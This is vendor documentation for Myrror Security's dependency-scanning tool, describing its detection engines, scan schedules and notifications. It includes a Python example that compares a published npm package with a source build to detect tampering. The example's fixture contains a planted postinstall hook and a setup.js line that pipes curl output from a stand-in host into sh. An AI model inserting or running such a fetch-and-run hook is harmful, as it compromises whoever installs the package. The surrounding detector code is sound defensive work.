Scan Types and Frequency
Scan Types Supported by Myrror Security
Myrror's SCA tool offers a range of scan types and options, catering to the diverse needs of developers. It allows for the selection of analysis engines and the setting of various parameters to tailor the tool to the environment.
Vulnerability Detection Engine
This engine detects publicly disclosed vulnerabilities in the application's dependencies and uses reachability analysis to prioritize those whose vulnerable code is actually reachable from the application's own code. It assesses the impact of each vulnerability on the application and provides detailed reports for remediation.
Tampering Detection Engine
Part of the supply chain attack detection suite, this engine identifies tampering in external dependencies, such as injected code. It checks that dependencies obtained from external sources reach the production environment untampered by analyzing the compiled binaries or published artifacts from package repositories and comparing them against the dependency's source code, so that code present in the artifact but absent from the source is flagged as unauthorized.
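To make the comparison concrete, the following is an added example and not Myrror's implementation: it diffs a published package against a build produced from the claimed source, reporting files that were added, removed or modified, and install-time hooks that appear only in the published manifest. Everything here is constructed for the illustration: the two trees are in-memory dicts of relative path to file bytes standing in for an extracted registry tarball and a local reproducible build, and the package is assumed to be an npm package whose install hooks live in the package.json "scripts" section.

```python
"""Added example (not Myrror's code): detect tampering in a published
dependency by comparing the registry artifact with a build from source.

Assumptions (constructed for this example): both trees are dicts mapping
relative path -> file bytes; the package is an npm package, so install
hooks are read from package.json "scripts".
"""
import hashlib
import json
from typing import Dict, List

# npm lifecycle scripts that execute on install; a hook that exists only in
# the published artifact is a classic injection point.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def diff_trees(source_build: Dict[str, bytes],
               published: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Files added to, missing from, or modified in the published artifact."""
    src, pub = set(source_build), set(published)
    return {
        "added": sorted(pub - src),
        "missing": sorted(src - pub),
        "modified": sorted(p for p in src & pub
                           if sha256(source_build[p]) != sha256(published[p])),
    }


def hook_changes(source_build: Dict[str, bytes],
                 published: Dict[str, bytes]) -> List[str]:
    """Install hooks whose value in the published package.json differs from source."""
    def hooks(tree: Dict[str, bytes]) -> Dict[str, str]:
        raw = tree.get("package.json")
        if raw is None:
            return {}
        scripts = json.loads(raw).get("scripts", {})
        return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}

    src, pub = hooks(source_build), hooks(published)
    return sorted(f"{k}: {v}" for k, v in pub.items() if src.get(k) != v)


def verdict(source_build: Dict[str, bytes],
            published: Dict[str, bytes]) -> Dict[str, object]:
    """Combine the file diff and hook diff into a single tampering verdict."""
    d = diff_trees(source_build, published)
    h = hook_changes(source_build, published)
    tampered = bool(d["added"] or d["missing"] or d["modified"] or h)
    return {**d, "hook_changes": h, "tampered": tampered}


# Constructed sample: the published tarball carries an extra file and a
# postinstall hook that the source tree does not have.
SOURCE_BUILD = {
    "package.json": b'{"name":"left-pad-ish","version":"1.0.0","main":"index.js",'
                    b'"scripts":{"test":"node test.js"}}',
    "index.js": b"module.exports = (s, n) => s.padStart(n);\n",
}
PUBLISHED = {
    "package.json": b'{"name":"left-pad-ish","version":"1.0.0","main":"index.js",'
                    b'"scripts":{"test":"node test.js","postinstall":"node setup.js"}}',
    "index.js": b"module.exports = (s, n) => s.padStart(n);\n",
    "setup.js": b"require('child_process').exec('curl http://example.invalid | sh');\n",
}

if __name__ == "__main__":
    print(json.dumps(verdict(SOURCE_BUILD, PUBLISHED), indent=2))
```

The comparison is only meaningful when the build from source is reproducible: timestamps, minifier versions or bundler nondeterminism will show up as "modified" files and produce false positives, so a production detector normalizes build outputs or compares at a higher level than raw bytes rather than relying on file hashes alone.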
Malicious Packages Detection Engine
This engine identifies packages that were built to be malicious, including previously unseen threats that no advisory describes yet. It uses trained machine learning models to detect signatures and code patterns that indicate malicious intent.
Developers can configure Myrror to utilize all engines or select specific ones based on their requirements.
Scan Frequency
On Commit and PRs to Specific Branches
Scans run on each PR or commit to the selected branches, which is particularly useful for organizations that work with feature branches. Any branch can be selected, typically the main branch, and the action taken on PRs that introduce dependencies with security issues is configurable, such as sending a notification or blocking the merge.
Periodic Scans
Even when nothing changes on the SCM platform, Myrror can scan periodically so that newly published advisories affecting existing dependencies are picked up. By default, scans run every three days, in line with the typical rate at which CVEs are published and updated, keeping the application's security posture current.
Notifications
Developers can configure notifications based on their specific needs, whether for supply chain attack detection, the discovery of critical vulnerabilities, or opting for no notifications if preferred.